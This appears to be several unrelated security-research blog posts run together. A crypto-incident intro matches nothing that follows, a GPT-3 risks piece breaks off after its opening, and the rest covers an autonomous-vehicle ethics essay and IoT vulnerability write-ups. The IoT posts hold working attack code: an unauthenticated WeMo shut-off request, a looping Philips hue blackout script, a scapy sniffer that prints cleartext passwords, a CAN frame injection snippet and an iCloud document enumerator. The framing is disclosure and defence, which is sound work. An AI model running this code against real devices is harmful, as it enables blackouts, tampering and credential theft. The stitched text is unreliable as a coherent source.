The nefarious tactics being employed in the crypto universe are a useful study because they shed light on the current state of risk and what needs to be improved in terms of trust. This write-up covers some recent security incidents, analyzes their root causes, and sets the stage for understanding what's to come in terms of the players involved and their future incentives.
AI Powered Misinformation and Manipulation at Scale #GPT-3
Risks of autoregressive language models and the future of prompt engineering.
A bunch of very smart people got together and built a bot. They programmed this bot to read the entirety of the Internet. Having read most of the stuff on the Internet, this bot is now pretty great at knowing what word most probably comes next, and the word after that word, if you give it a bunch of words to start with. Like how the iMessage app suggests 3 words you probably will type next.
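As a toy illustration of the autocomplete idea (this is not how GPT-3 works internally; GPT-3 is a transformer trained on vastly more data, while this sketch just counts word pairs in one sample sentence), a few lines of Python can learn which word tends to follow which and offer suggestions:
from collections import Counter, defaultdict

# Toy "autocomplete": count which word follows which in a tiny sample corpus.
corpus = "the cat sat on the mat and the cat slept on the sofa".split()

following = defaultdict(Counter)
for current_word, next_word in zip(corpus, corpus[1:]):
    following[current_word][next_word] += 1

def suggest(word, n=3):
    # Return up to n most likely next words, like a keyboard's suggestion strip.
    return [candidate for candidate, _ in following[word].most_common(n)]

print(suggest("the"))  # ['cat', 'mat', 'sofa']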
This autocomplete bot can manipulate people on social media and spew political propaganda, argue about the meaning of life (or lack thereof), disagree with the notion of what constitutes a hot-dog versus a sandwich, take on the persona of the Buddha or Hitler or a dead family member, write fake news articles that are indistinguishable from human-written articles, and also produce computer code on the fly. Well, among other things.
This bot is called GPT-3 and the very smart people are the researchers from OpenAI.
GPT-3 has captured much mainstream attention, and rightfully so: it has sparked colorful conversations on the Turing test and perceived consciousness, even amongst AI scientists who know the technical mechanics. The chatter on perceived consciousness does have merit: it's quite probable that the underlying mechanism of our brain is a giant autocomplete bot that has learnt from 3 billion+ years of evolutionary data that bubbles up to our collective selves, and that we ultimately give ourselves too much credit for being original authors of our own thoughts (ahem, free will).
In this document, however, I’d like to share my thoughts on GPT-3 in terms of risks and countermeasures, and discuss real examples of how I have interacted with the model to support my learning journey.
Two ideas to set the stage:
OpenAI is not the only organization to have powerful language models. The compute power and data used by OpenAI to train GPT-n are available, and have been available, to other institutions, nation states, and anyone with access to a terminal and a stolen credit-card.
There exist more powerful models that are unknown to the general public. The ongoing global interest by institutions, governments, and focus groups in the power of machine learning models leads to the hypothesis that other entities most likely have models even more powerful than GPT-3, and that these models are already in use, and have been for some time, to support various use-cases. These models will continue to become more powerful over time.
Today, the phrase “self driving cars” projects a future where cars will drive themselves. In the future, the same phrase will mean the cars of yesteryear that we had to drive ourselves.
Autonomous vehicles are computers we will put ourselves inside of, and we will depend on them to make our lives safer. These vehicles are crafted by the work of engineers, physicists, and mathematicians; indeed, it is to the accuracy of their work that we will entrust our safety. Once we achieve this quest, non-autonomous vehicles are likely to be outlawed on public roadways, given how perversely common fatal car accidents caused by human error are. Designated private areas will let manual car drivers carry out their hobby, likely to be perceived similarly to designated smoking rooms at airports: "those weird people huddled together engaged in risky endeavors". We will look back in time and regard human car drivers with the same puzzlement we reserve for the elevator operators of the past.
Figure 1: Tesla will not allow its autonomous driving functionality on competing ride share networks
Ride share apps like Uber and Lyft will swiftly embrace self driving cars. This will in turn lower the cost of rides to the point where the efficiency of hailing an autonomous car will make fewer people purchase their own vehicles. Tesla, however, has a competing business model where the hope is that the car will switch into taxi mode to make money for the owner while she is busy at work (Figure 1). Either way, plot twists in the concept of sole car ownership are upon us.
I have written about software and architectural vulnerabilities in car systems and networks in Chapter 6: Connected Car Security Analysis — From Gas to Fully Electric of my book Abusing the Internet of Things: Blackouts, Freakouts, and Stakeouts. These types of security vulnerabilities are a serious risk, and we must strive for further improvement in this area. The scope of this article, however, is to focus on risks that come to light in the realm of cross-disciplinary studies: upcoming threat vectors that are rooted in an understanding of the design of these vehicles, rather than the application of well-known threat vectors to autonomous car design.
Indeed, the secure design of autonomous vehicle software calls for polymathic thinking: a cross-disciplinary approach that not only invokes the romance of seeking out new knowledge, but also applies a holistic framework of security, one that anticipates new attack vectors going well beyond traditional security vectors as they may apply to autonomous software.
Polymathic thinking calls upon designers to bring together the realms of philosophy, economics, law, and socio-economic concerns, so that we can align these areas with the concerns of security and safety. As designers and citizens, we need cross-disciplinary conversations to spark efficiency and safety in autonomous vehicles. This article series is an attempt to ignite that spark, and we begin by tackling the issue of morality and how it will relate to self-driving cars.
The Trolley Problem
Airline pilots can be faced with emergency situations that require landing at the nearest airport. Should landing at the nearest airport not be feasible, alternative landing sites such as fields or rivers may be an option. Highway roads, albeit hazardous given power lines, oncoming traffic, and pedestrians, may still be an option for smaller planes. The 2-D nature of car driving, on the other hand, mostly lends itself to a split-second brake-or-swerve decision on the part of the driver when it comes to avoiding accidents. In many car accidents, drivers don't have enough time to survey the situation and make the most rational decision.
When it comes to conversations on avoiding accidents and saving lives, the classic Trolley Problem is oft cited.
Figure 2: The Trolley Problem
Wikipedia describes the problem succinctly:
There is a runaway trolley barreling down the railway tracks. Ahead, on the tracks, there are five people tied up and unable to move. The trolley is headed straight for them. You are standing some distance off in the train yard, next to a lever. If you pull this lever, the trolley will switch to a different set of tracks. However, you notice that there is one person tied up on the side track. You have two options:
Do nothing, and the trolley kills the five people on the main track.
Pull the lever, diverting the trolley onto the side track where it will kill one person.
Which is the most ethical choice?
The utilitarian viewpoint will deem it just to pull the lever because doing so minimizes the number of lives lost. A competing viewpoint is that pulling the lever constitutes an intentional action that leads to the death of one individual, while doing nothing does not actively contribute to the five deaths that would have happened anyway. The act of pulling a lever to save more lives makes some of us uncomfortable because it makes us actively complicit in a killing.
There are many other variants of the Trolley Problem that have been put forth as thought experiments, and they are useful in arguing about the moral decisions that must be made by the developers who write self driving software. There are other issues besides the trolley problem at play, such as a vehicle veering off a cliff because of a bug in software code and killing its passengers. Our quest for self driving cars will get us to a world where fewer people die due to car accidents, yet some people will still perish for reasons such as software bugs. Who then must be held responsible for accidents and deaths? The individual developer who wrote that specific piece of faulty code? The car company? Legal precedent is unlikely to allow commercial companies to offload legal repercussions onto the car owner, given that the owner has lost autonomy by virtue of the self driving capabilities.
Rodney Brooks of MIT dismisses the conversation on the Trolley Problem as it pertains to self driving vehicles as "pure mental masturbation dressed up as moral philosophy". In his essay Unexpected Consequences of Self Driving Cars, Brooks writes:
Here’s a question to ask yourself. How many times when you have been driving have you had to make a forced decision on which group of people to drive into and kill? You know, the five nuns or the single child? Or the ten robbers or the single little old lady? For every time that you have faced such decision, do you feel you made the right decision in the heat of the moment? Oh, you have never had to make that decision yourself? What about all your friends and relatives? Surely they have faced this issue?
And that is my point. This is a made up question that will have no practical impact on any automobile or person for the foreseeable future. Just as these questions never come up for human drivers they won’t come up for self driving cars. It is pure mental masturbation dressed up as moral philosophy. You can set up web sites and argue about it all you want. None of that will have any practical impact, nor lead to any practical regulations about what can or can not go into automobiles. The problem is both non existent and irrelevant.
The fallacy in Brooks' argument is that he does not take into account the split-second decision-making that humans are incapable of when it comes to car accidents. The time our brains take to decide which direction to swerve and when to hit the brakes is too long. Sensors and computers in autonomous vehicles, on the other hand, have the capacity to categorize sensor data and make decisions within milliseconds.
On March 18, 2018, an Uber autonomous test vehicle struck a pedestrian who died from injuries. The Uber vehicle had one vehicle operator in the car and no passengers. The preliminary report from the National Transportation Safety Board (NTSB) states:
According to data obtained from the self-driving system, the system first registered radar and LIDAR observations of the pedestrian about 6 seconds before impact, when the vehicle was traveling at 43 mph. As the vehicle and pedestrian paths converged, the self-driving system software classified the pedestrian as an unknown object, as a vehicle, and then as a bicycle with varying expectations of future travel path. At 1.3 seconds before impact, the self-driving system determined that an emergency braking maneuver was needed to mitigate a collision. According to Uber, emergency braking maneuvers are not enabled while the vehicle is under computer control, to reduce the potential for erratic vehicle behavior. The vehicle operator is relied on to intervene and take action. The system is not designed to alert the operator.
It is clear from the NTSB report that Uber's autonomous software classified the pedestrian more accurately as it approached: an "unknown object", followed by "a vehicle", and then a "bicycle", which is accurate because the victim of the accident was crossing the road with her bicycle. The emergency braking system was disabled in this case, ultimately leading to the accident. The car did not even alert the driver (by design). It is not yet clear when the vehicle would have started braking (6 seconds prior versus 1.3 seconds) had the automatic braking feature been enabled. Nonetheless, had the system been enabled, the software would have had to make the call on when to apply the brakes, perhaps through a combination of manual tuning and machine learning.
Machine learning systems are able to classify objects in images with impressive accuracy: the average human error rate is 5.1%, while machine learning algorithms are able to classify images with an error rate of 2.251%. The self driving Uber was probably using a combination of Region-based Convolutional Neural Networks (R-CNNs) to detect objects in near real-time. It is unknown what classification or segmentation algorithms were employed in the case of the accident, and there are many more algorithms in scope for a self driving car than object classifiers. Yet it is evident that the hardware and software technology in self driving cars surpasses the physical limits of human senses.
We need to bring the issue of machine decisioning to the forefront if we are going to make any headway towards making our autonomous vehicle future safe. Brooks' argument dismisses the need for such decisioning outright, yet we have evidence today that demonstrates it is one of the more important issues we ought to solve in a meaningful manner. Brooks is right in saying that humans in control of a car almost never have the ability to decide whom to drive into and kill, but his argument doesn't account for the technical abilities of autonomous car computers that will make it possible for software to make these decisions.
Back to the topic of the Trolley Problem: engineers must account for decisions when a collision is unavoidable. These decisions will have to select from predictable outcomes, such as steering the vehicle to the left to minimize impact. These decisions will also include situations that could save the lives of the car's passengers while impacting the lives of people outside of the vehicle, such as pedestrians or passengers of another vehicle. Should the car minimize the total loss of life, or should the car prioritize the lives of its own passengers?
Figure 3: MIT’s Moral Machine
The Moral Machine project at MIT is an effort to illustrate the moral dilemmas that we are likely to face and have to "program in". Their website includes a list of interactive dilemmas relating to machine intelligence (Figure 3).
Imagine a case where the car computes that a collision is imminent and it has to swerve to the right or to the left. The sensors of the car quickly recognize a cyclist on the right and another on the left, the difference being that the cyclist on the left is not wearing a helmet. Should the car be programmed to swerve left since the cyclist on the right is deemed "more responsible" for wearing a helmet (and who must conjure up this moral calculus?)? Or should it pick a side at random? Autonomous cars will continuously observe objects around them. What of the case where the car is able to scan the license plate of a nearby vehicle and classify drivers as good or bad based on collision history? Perhaps this information could be useful in navigating around rogue drivers with evidence of a bad driving history, but should the same information be leveraged to decide whom to collide into and kill should an unavoidable collision occur?
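To make the discomfort concrete, here is a deliberately naive, entirely hypothetical Python sketch of what "programming in" such a policy could look like. None of the names, numbers, or policies below come from any real vehicle's software; the point is only that somebody has to write, and defend, code of this shape:
from dataclasses import dataclass

@dataclass
class Outcome:
    # One possible maneuver and its predicted casualties (made-up numbers).
    maneuver: str
    passenger_deaths: int
    bystander_deaths: int

def choose_maneuver(outcomes, policy):
    # 'utilitarian' minimizes total predicted deaths; 'protect_passengers'
    # minimizes passenger deaths first. Real systems would reason over noisy
    # probabilities, not clean integers; this is only a thought experiment.
    if policy == "utilitarian":
        key = lambda o: o.passenger_deaths + o.bystander_deaths
    elif policy == "protect_passengers":
        key = lambda o: (o.passenger_deaths, o.bystander_deaths)
    else:
        raise ValueError(f"unknown policy: {policy}")
    return min(outcomes, key=key)

options = [
    Outcome("swerve_left", passenger_deaths=0, bystander_deaths=2),
    Outcome("brake_straight", passenger_deaths=1, bystander_deaths=0),
]
print(choose_maneuver(options, "utilitarian").maneuver)          # brake_straight
print(choose_maneuver(options, "protect_passengers").maneuver)   # swerve_left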
Make It Utilitarian (But Not My Car)
On the topic of collision decisioning, does the general population of today prefer a utilitarian self driving vehicle? Jean-François Bonnefon et al., in their paper The social dilemma of autonomous vehicles, came up with the following analysis:
Autonomous Vehicles (AVs) should reduce traffic accidents, but they will sometimes have to choose between two evils-for example, running over pedestrians or sacrificing itself and its passenger to save them. Defining the algorithms that will help AVs make these moral decisions is a formidable challenge. We found that participants to six MTurk studies approved of utilitarian AVs (that sacrifice their passengers for the greater good), and would like others to buy them, but they would themselves prefer to ride in AVs that protect their passengers at all costs. They would disapprove of enforcing utilitarian AVs, and would be less willing to buy such a regulated AV. Accordingly, regulating for utilitarian algorithms may paradoxically increase casualties by postponing the adoption of a safer technology.
The findings are not surprising. It is straightforward to grasp the utilitarian viewpoint from an intellectual perspective, yet all bets are off when the situation includes ourselves and our loved ones. Still, the design of autonomous vehicles has spawned a moral challenge that humankind has not faced before: we must settle on a solution to this moral dilemma, design for it, and operationalize on unconscious hardware a system that will decide who is worthy of living.
In the absence of federal regulations, car companies may let the owner select from various types of decisions, or manufacturers may offer the prioritization of passenger lives as part of a luxury upgrade package, skewing favor towards the population able to afford it. Figure 4 depicts a mockup of the Tesla iPhone app allowing the owner to toggle the setting on or off.
Figure 4: Mockup of Tesla’s iPhone app depicting Utilitarian Mode as a setting
It is plausible to imagine federal regulations that compel a utilitarian mode to be permanently in effect. In such a world, the incentive for car owners to 'jailbreak', i.e. subvert the factory default software, will be high so as to prioritize the protection of their own lives. This sort of jailbreaking can extend to protocols designed for cooperation, for example two cars halting at a stop sign simultaneously. An industry-accepted protocol could propose a simple solution (in the case of two cars) where the cars engage in a digital coin toss and the winner gets to go first. If people were to jailbreak their car software to subvert this functionality and always go first, the situation could lead to confusion and perhaps collisions if every other car owner were to circumvent the protocol in the same way.
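For what it's worth, a fair digital coin toss is not hard to build. A generic commit-reveal scheme, sketched below in Python and not taken from any published automotive standard, has exactly the property a jailbroken "always go first" car would need to break: neither side can bias the result after seeing the other's commitment.
import hashlib
import secrets

def commit(value: bytes) -> bytes:
    # The commitment is simply the SHA-256 hash of the secret random value.
    return hashlib.sha256(value).digest()

# Each car picks a random nonce and first shares only the hash of it.
car_a_nonce = secrets.token_bytes(16)
car_b_nonce = secrets.token_bytes(16)
car_a_commitment = commit(car_a_nonce)
car_b_commitment = commit(car_b_nonce)

# After both commitments have been exchanged, the nonces are revealed and
# each car verifies that the other's reveal matches its earlier commitment.
assert commit(car_a_nonce) == car_a_commitment
assert commit(car_b_nonce) == car_b_commitment

# The toss is one bit derived from both nonces: neither car could have chosen
# its nonce to force the outcome without already knowing the other's nonce.
winner = "car A" if (car_a_nonce[0] ^ car_b_nonce[0]) & 1 == 0 else "car B"
print(f"{winner} proceeds through the stop sign first")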
Lessons of Pegasus
The term 'jailbreak' was coined by communities that work to modify the iOS operating system that powers iPhones and iPads. Apple asserts tight controls on its devices, which people in the jailbreak community wish to circumvent so that they can further customize their devices and add features not offered by Apple.
Figure 5: Apple’s warranty does not cover issues caused by jailbreaking
From Apple's vantage point, modification of core operating system code can lead to adverse effects, and it is unsustainable for Apple to keep track of or be responsible for changes made by third parties. Additionally, even though many jailbreak tweaks offer security features, they overtly trespass on fundamental security controls put in place by Apple, thereby putting the jailbroken device at additional risk. Known security vulnerabilities in iOS are needed to develop and execute a jailbreak; these vulnerabilities allow unauthorized code to be executed by the iPhone and iPad. At Apple's World Wide Developer Conference in 2016, Ivan Krstic, head of Security Engineering and Architecture at Apple, estimated that jailbreakers and hackers generally have to find and exploit between 5 and 10 distinct vulnerabilities to fully defeat the platform's inherent security mechanisms. Furthermore, he pointed out that the going black-market rate for a remotely exploitable vulnerability (one that can lead to a jailbreak) was estimated to be around $1 million (Figure 6). Compared to the cost of similar vulnerabilities for other popular operating systems, this suggests that Apple's anti-jailbreak mechanisms and platform security features are harder to exploit.
Figure 6: Apple estimates its remotely exploitable vulnerabilities are worth $1 million
In 2016, the security community was alerted to a sophisticated piece of iOS spyware named Pegasus that was found by Bill Marczak and engineers at the security company Lookout. An activist friend of Marczak located in the United Arab Emirates forwarded him a suspicious SMS message containing an Internet link that, when clicked, led to the immediate installation of spyware. Upon analysis, it became evident that this spyware leveraged three vulnerabilities in iOS to remotely exploit an iPhone and gain full control. Numerous attribution theories surround this incident, the most notable pointing to the NSO Group, an Israeli spyware company. Researchers found references to NSO in the source code for Pegasus, along with evidence that in addition to the targeting of Ahmed Mansoor in the UAE, the exploit was also targeted at Mexican journalist Rafael Cabrera, and quite possibly additional targets in Israel, Turkey, Thailand, Qatar, Kenya, Uzbekistan, Mozambique, Morocco, Yemen, Hungary, Saudi Arabia, Nigeria, and Bahrain.
Remotely exploitable vulnerabilities in iOS are sought after not only because iPhones and iPads enjoy a healthy market share, but also because finding these vulnerabilities is harder in Apple's products. Apple's iOS Security Guide document emphasizes system security, i.e. utmost care is taken to make sure that only authorized code is executed by the devices and that various security mechanisms work in tandem to make remotely exploitable conditions difficult.
In my book Abusing the Internet of Things, I have outlined the nature of the Controller Area Network (CAN) architecture in cars, which in essence is like a computer network where all physically connected computers are fully trusted. Electronic Control Units (ECUs) are the various computers in the car that relay sensor information as well as command other ECUs to take specific action. Traditionally, attack vectors targeting such an architecture have required physical access to the car. With the prevalence of telematics employing cellular communications, which essentially puts modern cars on the Internet, the CAN architecture is no longer sufficient to provide reasonable security assurance: should an external hacker be able to break into the car by exploiting a flaw in the telematics software, she could then remotely control the rest of the car. Such a scenario can pose an exponential impact should the attacker choose to infect and command cars en masse. Elon Musk has publicly stated that such a fleet-wide hack is one of his concerns.
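The trust problem is visible at the protocol level: a classic CAN frame carries an arbitration ID and up to eight data bytes, with no field that authenticates the sender. The sketch below uses the python-can library; the interface name and arbitration ID are placeholders for illustration, not values from any particular vehicle:
import can  # pip install python-can

# Connect to a CAN interface, e.g. a USB-to-CAN adapter exposed as 'can0'
# via SocketCAN on Linux. The channel name is environment-specific.
bus = can.interface.Bus(channel="can0", bustype="socketcan")

# A classic CAN frame: an 11-bit arbitration ID and up to 8 data bytes.
# There is no sender-authentication field; receiving ECUs act on the ID
# alone. The ID and payload here are placeholders for illustration.
message = can.Message(
    arbitration_id=0x123,
    data=[0x01, 0x00, 0x00, 0x00],
    is_extended_id=False,
)

bus.send(message)
print("Frame sent; any ECU listening for ID 0x123 will treat it as genuine.")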
As with iOS devices, remotely exploitable vulnerabilities can not only allow hackers to access and command the infected device, but also to jailbreak the device to subvert functionality. Circling back to our discussion on “programming in” moral rulesets per federal regulations, security vulnerabilities can allow individuals to jailbreak their autonomous vehicles and bypass these controls.
The rumor of Apple building an autonomous vehicle has been in the media for a few years now. A case could be made, albeit speculatively, that Apple may have an advantage in operationalizing an architecture that makes it difficult to bypass the security controls built into the product. In more tangible news, companies such as General Motors have appointed executive roles to oversee the secure design and architecture of vehicles.
An argument can be made in favor of vehicle jailbreaking in humanitarian situations, where journalists may be assigned vehicles that prohibit access to certain areas. These situations will have to be carefully weighed against the double-edged nature of implementing security mechanisms that are hard to circumvent.
Relentless Optimism
The prevalence of autonomous vehicles is going to bring into our lives moral dilemmas that have traditionally been confined to the province of academic contemplation. The transformative and disruptive nature of these technologies is bound to ignite legal discussions and precedents that may advance or even temporarily slow down the adoption of self driving cars.
The compute power of self driving cars will put us in a position to lower the death rate due to vehicle collisions, yet we are bound to be faced with deaths due to unavoidable collisions. In other words, fewer people will die, but they will die for reasons unfamiliar to our emotional faculties: software bugs, non-compliance due to circumvention of programmed moral controls, unfair moral controls and the lack of regulation, and many unforeseen reasons that we will uncover.
The status quo of 1.25 million global deaths due to road traffic crashes is not acceptable. Add to this number the suffering of the countless people injured in crashes. Not to mention the countless hours spent commuting that people could instead use for constructive work and meaningful conversations. It is clear that advancements in technology are the way to achieve improvements that will benefit us greatly, and while we may have misgivings along the way, the notion that we are moving towards betterment ought to fill us with unbounded and relentless optimism for the years ahead.
It's been a decade since we accepted the idea that the perimeter strategy for security is ineffective: endpoints must strive to protect their own stack rather than rely on their network segment being completely trustworthy. However, this notion has mostly permeated the corporate space. Even so, businesses are still struggling to implement controls in this area given the legacy of flat networks and operating system design.
When it comes to residences, the implicit notion is that controls beyond Network Address Translation (NAT) aren't immediately necessary from the perspective of cost and complexity. The emergence of the Internet of Things (IoT) is going to dramatically change this notion.
Figure 1: The Belkin WeMo Baby Monitor, the WeMo Switch, and the Wi-Fi NetCam
My point is illustrated in "Reconsidering the Perimeter Security [PDF]", where I take on the security design of the Belkin WeMo baby monitor, the WeMo wireless switch, and the NetCam Wi-Fi camera.
Figure 2: Lon J. Seidman's review of the WeMo baby monitor
In the case of the baby monitor, one glaring design issue was that anyone with one-time access to the local Wi-Fi network where the monitor is installed can listen in without authentication, and can continue to listen in remotely. This is also called out by Amazon reviewer Lon J. Seidman in his review titled "Poor security, iOS background tasks not reliable enough for child safety":
"...But that's not the only issue plaguing this device. The other is a very poor security model that leaves the WeMo open to unwelcome monitoring. The WeMo allows any iOS device on your network to connect to it and listen in without a password. If that's not bad enough, when an iPhone has connected once on the local network it can later tune into the monitor from anywhere in the world".
Figure 3: Demonstration of WeMo baby app concern
I've demonstrated the issue Seidman points out in the video above. The paper goes into more technical details.
Figure 4: Demonstration of malware turning the WeMo switch off
In the case of the WeMo switch, it was found that any device on the local network can turn it off without any additional authorization. In the paper, I describe how to write a script to do this.
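The original script is in the paper; the Python sketch below only conveys the idea. The switch exposes a UPnP control endpoint on the local network, and a plain SOAP request with no credentials flips the relay (the IP address is a placeholder, and the port and service path may differ across firmware versions):
import requests  # pip install requests

# Placeholder address of the switch; the UPnP port (typically 49152-49154)
# and service path can vary between firmware versions.
WEMO_URL = "http://192.168.1.50:49153/upnp/control/basicevent1"

# BinaryState 0 requests "off"; 1 requests "on".
SOAP_BODY = """<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
            s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:SetBinaryState xmlns:u="urn:Belkin:service:basicevent:1">
      <BinaryState>0</BinaryState>
    </u:SetBinaryState>
  </s:Body>
</s:Envelope>"""

headers = {
    "Content-Type": 'text/xml; charset="utf-8"',
    "SOAPACTION": '"urn:Belkin:service:basicevent:1#SetBinaryState"',
}

# No session, token, or password is required: any device on the Wi-Fi
# network can issue this request and toggle the outlet.
response = requests.post(WEMO_URL, data=SOAP_BODY, headers=headers, timeout=5)
print(response.status_code)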
Figure 5: Belkin NetCam sends credentials in clear-text to a remote server
The Belkin NetCam uses SSL and requires the user to log in even if the user is on the local Wi-Fi network. However, as shown in Figure 5, it manages to send the credentials in the clear to a remote server. This enables local malware, or any server in the path via the ISP, to capture the credentials and spy on the camera's owners.
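To illustrate why cleartext transmission matters, the sketch below (Python with scapy, run with root privileges on a machine positioned on the network path; the interface name is environment-specific) passively prints any HTTP payload that looks like it carries credentials:
from scapy.all import Raw, sniff  # pip install scapy

def show_cleartext(packet):
    # Print any readable HTTP payload that appears to carry credentials;
    # a cleartext login POST or Authorization header shows up verbatim.
    if packet.haslayer(Raw):
        payload = bytes(packet[Raw]).decode(errors="ignore")
        if "Authorization:" in payload or "password" in payload.lower():
            print(payload)

# Requires root privileges; the interface name is environment-specific.
sniff(iface="en0", filter="tcp port 80", prn=show_cleartext, store=False)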
Given the upcoming revolution of automation in our homes, we are already seeing self-installable IoT devices such as the candidates discussed. As the examples above illustrate, we cannot secure our future by asserting that IoT devices and their supporting applications have no responsibility for protecting the user's privacy and security beyond requiring the user to set up a strong WiFi password.
IoT device manufacturers should lay the foundation for a strong security architecture that is usable and not easily subvertible by other devices on the network. In these times, a compromised device on a home network can lead to the loss of financial and personal information. If IoT device vendors continue their approach of depending on the local home network and all other devices being completely secure, we will live in a world where a compromised device can result in gross remote violation of the privacy and physical security of their customers.
The phenomenon of the Internet of Things (IoT) is positively influencing our lives by augmenting our spaces with intelligent and connected devices. Examples of these devices include lightbulbs, motion sensors, door locks, video cameras, thermostats, and power outlets. By 2022, the average household with two teenage children will own roughly 50 such Internet connected devices, according to estimates by the Organization for Economic Co-Operation and Development. Our society is starting to increasingly depend upon IoT devices to promote automation and increase our well being. As such, it is important that we begin a dialogue on how we can securely enable the upcoming technology.
I am excited to release my security research on the Philips hue lighting system. The hue personal wireless system is available for purchase from the Apple Store and other outlets. Out of the box, the system comprises wireless LED light bulbs and a wireless bridge. The light bulbs can be configured to display any of 16 million colors.
I'd like to highlight a particular vulnerability that can be used by malware on an infected machine on the user's internal network to cause a sustained blackout. A demonstration of this vulnerability can be seen in the video above. For details, please read the PDF. The sample malware script (hue_blackout.bash) can be found in Appendix A.
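The actual proof of concept is the bash script in Appendix A; the Python sketch below merely illustrates the shape of the underlying REST calls. Once a request carries a token the bridge has whitelisted, a loop like this keeps every bulb dark (the bridge address and token shown are placeholders):
import time

import requests  # pip install requests

BRIDGE_IP = "192.168.1.10"         # placeholder address of the hue bridge
TOKEN = "whitelisted-username"     # placeholder for a token the bridge accepts

def blackout():
    # Enumerate every bulb known to the bridge and switch each one off.
    lights = requests.get(f"http://{BRIDGE_IP}/api/{TOKEN}/lights", timeout=5).json()
    for light_id in lights:
        requests.put(
            f"http://{BRIDGE_IP}/api/{TOKEN}/lights/{light_id}/state",
            json={"on": False},
            timeout=5,
        )

# A "sustained" blackout is just the same call in a loop, re-issuing the off
# command faster than the victim can turn the lights back on.
while True:
    blackout()
    time.sleep(1)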
Here were the goals of the research:
- Lighting is critical to physical security. Smart lightbulb systems are likely to be deployed in current and new residential and corporate constructions. An abuse case such as the ability of an intruder to remotely shut off lighting in locations such as hospitals and other public venues can result in serious consequences.
- The system is easily available in the marketplace and is one of the more popular self installable wireless light bulb solutions.
- The architecture employs a mix of network protocols and application interfaces that is interesting to evaluate from a design perspective. It is likely that competing products will deploy similar interfaces thereby inheriting abuse cases.
The hue system is a wonderfully innovative product. It is therefore important to understand how it works and to ultimately push forward the secure enablement of similar IoT products.
The "protect the data, not the (mobile) device" mantra is permeating organizations today, and that is a good thing. In this article, I wish to support that thought process by lending evidence for the following hypothesis: cloud synchronization services are likely to become a popular attack target by way of the desktop, which is currently the weakest link.
In other words (and using Apple’s ecosystem as an example):
Individuals in the workplace who use an iOS device (iPhone or iPad) also own a desktop (or laptop).
The desktop operating system (OSX or Windows) is still the avenue of choice for attack.
Individuals are increasingly relying upon applications on their mobile devices to store private information (credentials, financial, health).
Most users use iCloud to sync data between the applications on their various devices. Note that iCloud files sync across devices regardless of whether a corresponding app is installed on a particular device.
Malware or a rootkit that infects the desktop can steal and influence data that is synced using iCloud (as illustrated in the rest of this article).
Figure 1: Core iCloud services provided by Apple
iCloud offers two distinct sets of services. As shown in Figure 1, the core services allow the user to back up and restore their device, as well as sync (i)Messages, contacts, calendars, reminders, Safari bookmarks & open tabs, notes, Passbook information, and photos, and use the Find My iPhone feature.
These services can be turned on individually or managed via an MDM (Mobile Device Management) solution. Should these services be utilized, the "keys to the kingdom" for accessing the user's device data rely fully upon the strength and secrecy of the user's iCloud password. In my blog post titled Apple's iCloud: Thoughts on Security and the Storage APIs [PDF], I discuss this risk, in addition to the possibility of automated tools that take credentials compromised in other attacks (and published in forums and avenues such as @PastebinLeaks) and use them to capture users' iOS device data en masse.
Figure 2: iCloud Storage APIs (turned off in this case)
The second set of services offered as part of iCloud comprises the Storage APIs, which 3rd party developers can use to have user sessions and application data seamlessly sync across devices and operating systems. This feature is the focus of this write-up.
Figure 3: iCloud directory in the GoodReader app on the iPhone
Figure 4: iCloud directory in the GoodReader app on the iPad
For example, the GoodReader app can be configured to use iCloud to manage documents across devices (iPhone in Figure 3 and the iPad in Figure 4).
For the purposes of the attack vector, assume that the user’s Macbook Air has been compromised. Traditionally, the attacker would be limited to the data stored on the OSX file-system. If the attacker wanted to gain access to data on other devices, the best bet would be to look for backup files. However, many users these days do not routinely backup their iOS devices with their laptops and choose to utilize iCloud instead. In this situation, the attacker can directly browse to the user’s ~/Library/Mobile Documents/ directory to access application data stored by apps that utilize the iCloud Storage APIs. What’s more - any changes the attacker makes to files in this directory are synced back to the iOS devices.
$ ls -al ~/Library/Mobile\ Documents/JFJWWP64QD~com~goodiware~GoodReader/Documents/Financials/
total 8
drwxr-xr-x 3 user staff 102 Jan 29 21:04 .
drwxr-xr-x 4 user staff 136 Jan 29 21:02 ..
-rw-r--r-- 1 user staff 2784 Jan 29 21:04 Fiscal_Q1.pdf
At this point, the attacker can steal the Fiscal_Q1.pdf file, delete it, or alter it. These changes will be reflected on the user's iOS devices within seconds. Imagine the implications this might have for a victim whose profession is in the financial, medical, or military fields.
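To underline how little effort this takes, here is a minimal Python sketch, run as the logged-in user on the compromised Mac, that simply enumerates every document the iCloud Storage APIs have mirrored locally; anything such a script copies or rewrites would be synced back to the victim's iOS devices:
import os
from pathlib import Path

# Local mirror of documents synced via the iCloud Storage APIs on OS X.
MOBILE_DOCS = Path.home() / "Library" / "Mobile Documents"

# Walk every per-app container and list the files inside it. No elevated
# privileges are needed: the directory belongs to the logged-in user.
for container in sorted(MOBILE_DOCS.iterdir()):
    if not container.is_dir():
        continue
    print(f"[app container] {container.name}")
    for root, _dirs, files in os.walk(container):
        for name in files:
            print("   ", Path(root, name).relative_to(MOBILE_DOCS))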
Based on this possibility, here are some points to take away:
The desktop OS is quite likely still the weakest link and can give rise to Cross Device Attacks such as these. Future malware and rootkits are likely to exploit this. In the case of iOS devices with Document sync turned on, attackers and rootkit authors are likely to take advantage of situations where one of the devices can be easily compromised. They are likely to target popular iCloud-enabled apps to steal data as well as to modify and influence business transactions to their advantage.
Developers need to be cognizant of the data flow within their apps. Not all types of data, specifically credentials, need to be synced across devices. Note that app data may also sync by way of Apple's core backup & restore service; developers can mark files that shouldn't be synced by invoking addSkipBackupAttributeToItemAtURL or by storing the files in Library/Caches within the iOS bundle.
Enterprises must prepare to enable sync services. At the moment, the easy solution may be to configure employee devices via MDM to disable iCloud backup and documents. However, customers and employees will demand the enablement of sync services such as these, which provide a seamless transition across devices and an increase in productivity. Perhaps the convergence of desktop and mobile operating systems and devices will pave the way in the right direction; it can be argued that the sandbox mechanism in OSX, which draws inspiration from the iOS sandbox architecture, is one example of this.
In summary, cloud sync technologies have blurred lines surrounding data compartmentalization. Organizations that are seriously looking into creating solid mobile security strategies must accept this reality - the entire ecosystem of devices, including attack vectors across devices, should be taken into account and incorporated into the strategy.
At the 2011 World Wide Developer Conference in San Francisco, Steve Jobs revealed his vision for Apple’s iCloud: to demote the desktop as the central media hub and to seamlessly integrate the user’s experience across devices.
